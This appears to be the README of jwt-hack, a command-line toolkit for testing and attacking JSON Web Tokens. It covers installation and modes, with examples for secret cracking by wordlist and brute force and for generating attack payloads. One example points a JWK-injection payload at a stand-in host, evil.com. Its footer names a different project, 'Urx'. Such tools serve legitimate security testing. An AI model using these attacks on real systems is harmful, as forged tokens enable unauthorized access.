
JSON Web Token Hack Toolkit
A high-performance toolkit for testing, analyzing and attacking JSON Web Tokens.
```bash
cargo install jwt-hack
brew install jwt-hack
sudo snap install jwt-hack

git clone https://github.com/hahwul/jwt-hack
cd jwt-hack
cargo install --path .

docker pull ghcr.io/hahwul/jwt-hack:latest
docker pull hahwul/jwt-hack:v2.0.0
```
Mode | Description | Support |
---|---|---|
Encode | JWT Encoder | Secret based / Key based / Algorithm / Custom Header |
Decode | JWT Decoder | Algorithm, Issued At Check |
Verify | JWT Verifier | Secret based / Key based (for asymmetric algorithms) |
Crack | Secret Cracker | Dictionary Attack / Brute Force |
Payload | JWT Attack Payload Generator | none / jku&x5u / alg_confusion / kid_sql / x5c / cty |
```bash
jwt-hack decode eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiIxMjM0In0.CHANGED

# With Secret
jwt-hack encode '{"sub":"1234"}' --secret=your-secret
# With Private Key
ssh-keygen -t rsa -b 4096 -E SHA256 -m PEM -P "" -f RS256.key
jwt-hack encode '{"a":"z"}' --private-key RS256.key --algorithm=RS256
```
Checks if a JWT's signature is valid using the provided secret or key.
```bash
# With Secret (HMAC algorithms like HS256, HS384, HS512)
jwt-hack verify YOUR_JWT_TOKEN_HERE --secret=your-256-bit-secret
# With Private Key (for asymmetric algorithms like RS256, ES256)
jwt-hack verify YOUR_JWT_TOKEN_HERE --private-key path/to/your/RS256_private.key
```
```bash
# Dictionary attack
jwt-hack crack -w wordlist.txt JWT_TOKEN
# Bruteforce attack
jwt-hack crack -m brute JWT_TOKEN --max=4

jwt-hack payload JWT_TOKEN --jwk-attack evil.com --jwk-trust trusted.com
```
Urx is an open-source project made with ❤️. If you want to contribute to this project, please see CONTRIBUTING.md and open a pull request with your cool content.